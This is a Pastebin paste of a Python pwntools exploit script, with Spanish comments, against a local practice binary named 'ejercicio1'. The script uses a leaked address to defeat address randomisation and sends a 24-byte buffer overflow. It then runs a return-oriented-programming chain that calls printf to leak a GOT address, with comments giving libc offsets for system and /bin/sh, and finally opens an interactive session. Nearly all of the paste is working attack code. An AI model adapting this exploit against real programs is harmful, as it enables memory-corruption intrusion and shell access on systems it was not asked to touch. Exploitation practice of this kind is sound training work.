Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/usr/bin/python3
- from pwn import *
- fileName = "./ejercicio1"
- e = ELF(fileName) #Checksec ejercicio1
- gdbs = '''
- b vuln
- '''
- #p = process(fileName) # proceeso sin debug GDB
- p = gdb.debug(fileName, gdbscript = gdbs) #Proceso con Debug GDB enviando un continue
- libc = e.libc
- print(p.recvuntil(b"Ya sabes que hacer:"))
- leak = p.recvline().split(b"\n")
- leak = int(leak[0],16)
- vuln = 0x118d
- offset = leak - 0x118d
- full_vuln = offset + 0x118d
- ret = offset + 0x101a
- poprdi = offset + 0x1233
- poprsp_r15 = offset + 0x122d
- poprsi_r15 = offset + 0x1231
- got_printf = offset + 0x3fc8
- printf = offset + 0x1060
- main = offset + 0x1169
- format_printf = offset + 0x2004
- # '0x50ae0' system en lib.c
- # '0x1d7cba' /bin/sh en lib.c
- print (hex(leak))
- print (hex(vuln))
- print (hex(offset))
- payload = b'A' * 24 # igual a \x41
- #payload += b'B' * 8 # igual a \x42 Direccion RET
- #payload += p64(ret)
- #payload += p64(poprsi_r15)
- #payload += p64(got_printf)
- #payload += p64(0)
- #payload += p64(poprdi)
- #payload += p64(got_printf)
- #payload += p64(poprsp_r15)
- #payload += p64(full_vuln)
- #payload += p64(ret)
- #payload += p64(ret)
- #payload += p64(printf)
- #payload += p64(full_vuln)
- payload += p64(poprdi)
- payload += p64(format_printf)
- payload += p64(poprsi_r15)
- payload += p64(got_printf)
- payload += p64(0)
- #payload += p64(0)
- #payload += p64(0)
- #payload += p64(ret)
- payload += p64(printf)
- payload += p64(ret)
- #print(p.recvuntil(b"hacer:"))
- p.sendline(payload)
- print(p.recvuntil(b":"))
- leak = p.recvline().split(b"\n")
- leak = int(leak[0],16)
- print (hex(leak))
- p.interactive()
Add Comment
Please, Sign In to add comment
